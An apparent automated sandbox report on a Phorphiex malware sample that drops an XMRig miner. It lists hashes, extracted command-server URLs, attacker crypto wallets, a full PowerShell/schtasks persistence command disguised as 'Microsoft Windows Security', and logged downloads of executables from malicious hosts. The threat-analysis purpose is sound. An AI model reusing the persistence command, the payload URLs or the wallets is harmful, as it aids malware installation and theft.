Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
05-12-2024 08:04
Static task
static1
Behavioral task
behavioral1
Sample
8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
Resource
win7-20241023-en
General
-
Target
8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe
-
Size
447KB
-
MD5
d5d3129db24df5cccdb15ea1f5cbd119
-
SHA1
67e1bd36976019766d2f4e8cc02be8935001c661
-
SHA256
8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160
-
SHA512
74dca8888ffc584e1e56b4644e71b0941f06825ff2542edbe4196fda3f540e8b5d8a39c047aed7707c80be975802133e88769efdfc65e99f363fe96d73b9dea5
-
SSDEEP
6144:QLPnZC2bLwAMEDMrHDxn1pyvGp3wCat3SluW3DMSHMRdpwWDYql4qRFT5P5GD:Q7nZ1fgrjBryvlSlu4M/0WsqlbxU
Malware Config
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
-
mutex
753f85d83d
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
phorphiex
http://twizt.net
http://185.215.113.84
Signatures
-
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000016cd7-11.dat family_phorphiex -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 2884 created 1188 2884 3084034625.exe 21 PID 2884 created 1188 2884 3084034625.exe 21 PID 2568 created 1188 2568 winupsecvmgr.exe 21 PID 2568 created 1188 2568 winupsecvmgr.exe 21 PID 2568 created 1188 2568 winupsecvmgr.exe 21 -
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2568-86-0x000000013F6A0000-0x000000013FC37000-memory.dmp xmrig behavioral1/memory/2568-88-0x000000013F6A0000-0x000000013FC37000-memory.dmp xmrig behavioral1/memory/2984-93-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2984-95-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2984-97-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2984-99-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2984-101-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2984-103-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 1084 BD85.exe 2764 3278622590.exe 2792 sysnldcvmr.exe 2684 2986423650.exe 2508 2127311717.exe 2884 3084034625.exe 3016 1268232551.exe 2568 winupsecvmgr.exe 1184 2594321231.exe -
Loads dropped DLL 9 IoCs
pid Process 1236 8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe 1084 BD85.exe 1084 BD85.exe 2792 sysnldcvmr.exe 2792 sysnldcvmr.exe 2508 2127311717.exe 2792 sysnldcvmr.exe 1600 taskeng.exe 2792 sysnldcvmr.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 3278622590.exe -
pid Process 1180 powershell.exe 1124 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2568 set thread context of 2092 2568 winupsecvmgr.exe 52 PID 2568 set thread context of 2984 2568 winupsecvmgr.exe 53 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\sysnldcvmr.exe 3278622590.exe File opened for modification C:\Windows\sysnldcvmr.exe 3278622590.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BD85.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3278622590.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2127311717.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2594321231.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2592 schtasks.exe 944 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2884 3084034625.exe 2884 3084034625.exe 1180 powershell.exe 2884 3084034625.exe 2884 3084034625.exe 2568 winupsecvmgr.exe 2568 winupsecvmgr.exe 1124 powershell.exe 2568 winupsecvmgr.exe 2568 winupsecvmgr.exe 2568 winupsecvmgr.exe 2568 winupsecvmgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1180 powershell.exe Token: SeDebugPrivilege 1124 powershell.exe Token: SeLockMemoryPrivilege 2984 dwm.exe Token: SeLockMemoryPrivilege 2984 dwm.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe 2984 dwm.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 1236 wrote to memory of 1084 1236 8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe 32 PID 1236 wrote to memory of 1084 1236 8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe 32 PID 1236 wrote to memory of 1084 1236 8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe 32 PID 1236 wrote to memory of 1084 1236 8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe 32 PID 1084 wrote to memory of 2764 1084 BD85.exe 33 PID 1084 wrote to memory of 2764 1084 BD85.exe 33 PID 1084 wrote to memory of 2764 1084 BD85.exe 33 PID 1084 wrote to memory of 2764 1084 BD85.exe 33 PID 2764 wrote to memory of 2792 2764 3278622590.exe 34 PID 2764 wrote to memory of 2792 2764 3278622590.exe 34 PID 2764 wrote to memory of 2792 2764 3278622590.exe 34 PID 2764 wrote to memory of 2792 2764 3278622590.exe 34 PID 2792 wrote to memory of 2684 2792 sysnldcvmr.exe 36 PID 2792 wrote to memory of 2684 2792 sysnldcvmr.exe 36 PID 2792 wrote to memory of 2684 2792 sysnldcvmr.exe 36 PID 2792 wrote to memory of 2684 2792 sysnldcvmr.exe 36 PID 2792 wrote to memory of 2508 2792 sysnldcvmr.exe 37 PID 2792 wrote to memory of 2508 2792 sysnldcvmr.exe 37 PID 2792 wrote to memory of 2508 2792 sysnldcvmr.exe 37 PID 2792 wrote to memory of 2508 2792 sysnldcvmr.exe 37 PID 2508 wrote to memory of 2884 2508 2127311717.exe 39 PID 2508 wrote to memory of 2884 2508 2127311717.exe 39 PID 2508 wrote to memory of 2884 2508 2127311717.exe 39 PID 2508 wrote to memory of 2884 2508 2127311717.exe 39 PID 2792 wrote to memory of 3016 2792 sysnldcvmr.exe 40 PID 2792 wrote to memory of 3016 2792 sysnldcvmr.exe 40 PID 2792 wrote to memory of 3016 2792 sysnldcvmr.exe 40 PID 2792 wrote to memory of 3016 2792 sysnldcvmr.exe 40 PID 1180 wrote to memory of 2592 1180 powershell.exe 43 PID 1180 wrote to memory of 2592 1180 powershell.exe 43 PID 1180 wrote to memory of 2592 1180 powershell.exe 43 PID 1600 wrote to memory of 2568 1600 taskeng.exe 47 PID 1600 wrote to memory of 2568 1600 taskeng.exe 47 PID 1600 wrote to memory of 2568 1600 taskeng.exe 47 PID 2792 wrote to memory of 1184 2792 sysnldcvmr.exe 48 PID 2792 wrote to memory of 1184 2792 sysnldcvmr.exe 48 PID 2792 wrote to memory of 1184 2792 sysnldcvmr.exe 48 PID 2792 wrote to memory of 1184 2792 sysnldcvmr.exe 48 PID 1124 wrote to memory of 944 1124 powershell.exe 51 PID 1124 wrote to memory of 944 1124 powershell.exe 51 PID 1124 wrote to memory of 944 1124 powershell.exe 51 PID 2568 wrote to memory of 2092 2568 winupsecvmgr.exe 52 PID 2568 wrote to memory of 2984 2568 winupsecvmgr.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe"C:\Users\Admin\AppData\Local\Temp\8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\BD85.exe"C:\Users\Admin\AppData\Local\Temp\BD85.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\3278622590.exeC:\Users\Admin\AppData\Local\Temp\3278622590.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Local\Temp\2986423650.exeC:\Users\Admin\AppData\Local\Temp\2986423650.exe6⤵
- Executes dropped EXE
PID:2684
-
-
C:\Users\Admin\AppData\Local\Temp\2127311717.exeC:\Users\Admin\AppData\Local\Temp\2127311717.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Users\Admin\AppData\Local\Temp\3084034625.exeC:\Users\Admin\AppData\Local\Temp\3084034625.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2884
-
-
-
C:\Users\Admin\AppData\Local\Temp\1268232551.exeC:\Users\Admin\AppData\Local\Temp\1268232551.exe6⤵
- Executes dropped EXE
PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\2594321231.exeC:\Users\Admin\AppData\Local\Temp\2594321231.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1184
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2592
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:944
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2092
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2984
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A51A4541-467A-4165-9FF3-F69C21B443AD} S-1-5-21-1163522206-1469769407-485553996-1000:PJCSDMRP\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2568
-
Network
-
GEThttp://185.215.113.66/32.exe8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exeRemote address:185.215.113.66:80RequestGET /32.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 185.215.113.66
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:04:38 GMT
Content-Type: application/octet-stream
Content-Length: 10240
Last-Modified: Thu, 28 Nov 2024 09:15:33 GMT
Connection: keep-alive
ETag: "674834b5-2800"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requesttwizt.netIN AResponsetwizt.netIN A185.215.113.66
-
Remote address:185.215.113.66:80RequestGET /newtpp.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: twizt.net
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:04:41 GMT
Content-Type: application/octet-stream
Content-Length: 80896
Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
Connection: keep-alive
ETag: "6733d71b-13c00"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /peinstall.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: twizt.net
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:04:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.66:80RequestGET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:04:50 GMT
Content-Type: application/octet-stream
Content-Length: 9472
Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
Connection: keep-alive
ETag: "674f01b0-2500"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:04:51 GMT
Content-Type: application/octet-stream
Content-Length: 9472
Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
Connection: keep-alive
ETag: "674f01b0-2500"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:04:56 GMT
Content-Type: application/octet-stream
Content-Length: 10496
Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
Connection: keep-alive
ETag: "67154d18-2900"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:04:57 GMT
Content-Type: application/octet-stream
Content-Length: 10496
Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
Connection: keep-alive
ETag: "67154d18-2900"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:05:02 GMT
Content-Type: application/octet-stream
Content-Length: 55040
Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
Connection: keep-alive
ETag: "674b357a-d700"
Accept-Ranges: bytes
-
Remote address:185.215.113.84:80RequestGET /nxmr.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: 185.215.113.84
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:05:02 GMT
Content-Type: application/octet-stream
Content-Length: 5827584
Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT
Connection: keep-alive
ETag: "66f70fa2-58ec00"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:05:04 GMT
Content-Type: application/octet-stream
Content-Length: 55040
Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
Connection: keep-alive
ETag: "674b357a-d700"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:05:09 GMT
Content-Type: application/octet-stream
Content-Length: 63232
Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
Connection: keep-alive
ETag: "67497f08-f700"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 200 OK
Date: Thu, 05 Dec 2024 08:05:10 GMT
Content-Type: application/octet-stream
Content-Length: 63232
Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
Connection: keep-alive
ETag: "67497f08-f700"
Accept-Ranges: bytes
-
Remote address:185.215.113.66:80RequestGET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 185.215.113.66
ResponseHTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 08:05:16 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
-
Remote address:91.202.233.141:80RequestGET /IBSTSWSONL HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Host: 91.202.233.141
ResponseHTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 08:05:15 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
-
Remote address:91.202.233.141:80RequestGET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141
ResponseHTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 08:05:19 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
-
Remote address:91.202.233.141:80RequestGET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141
ResponseHTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 08:05:21 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
-
Remote address:91.202.233.141:80RequestGET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141
ResponseHTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 08:05:23 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
-
Remote address:91.202.233.141:80RequestGET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141
ResponseHTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 08:05:25 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
-
Remote address:91.202.233.141:80RequestGET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Host: 91.202.233.141
ResponseHTTP/1.1 404 Not Found
Date: Thu, 05 Dec 2024 08:05:28 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
-
Remote address:8.8.8.8:53Requesttwizthash.netIN AResponsetwizthash.netIN A185.215.113.66
-
Remote address:8.8.8.8:53Requestwww.update.microsoft.comIN AResponsewww.update.microsoft.comIN CNAMEredir.update.msft.com.trafficmanager.netredir.update.msft.com.trafficmanager.netIN A20.109.209.108
-
185.215.113.66:80http://185.215.113.66/32.exehttp8ed50e70af62aa2c4d0a9d3eea1adb96d2605aef88353c5e6ed7da76fbc99160.exe687 B 10.9kB 8 10
HTTP Request
GET http://185.215.113.66/32.exeHTTP Response
200 -
2.2kB 83.9kB 41 64
HTTP Request
GET http://twizt.net/newtpp.exeHTTP Response
200HTTP Request
GET http://twizt.net/peinstall.phpHTTP Response
200 -
622 B 10.2kB 10 11
HTTP Request
GET http://185.215.113.66/1HTTP Response
200 -
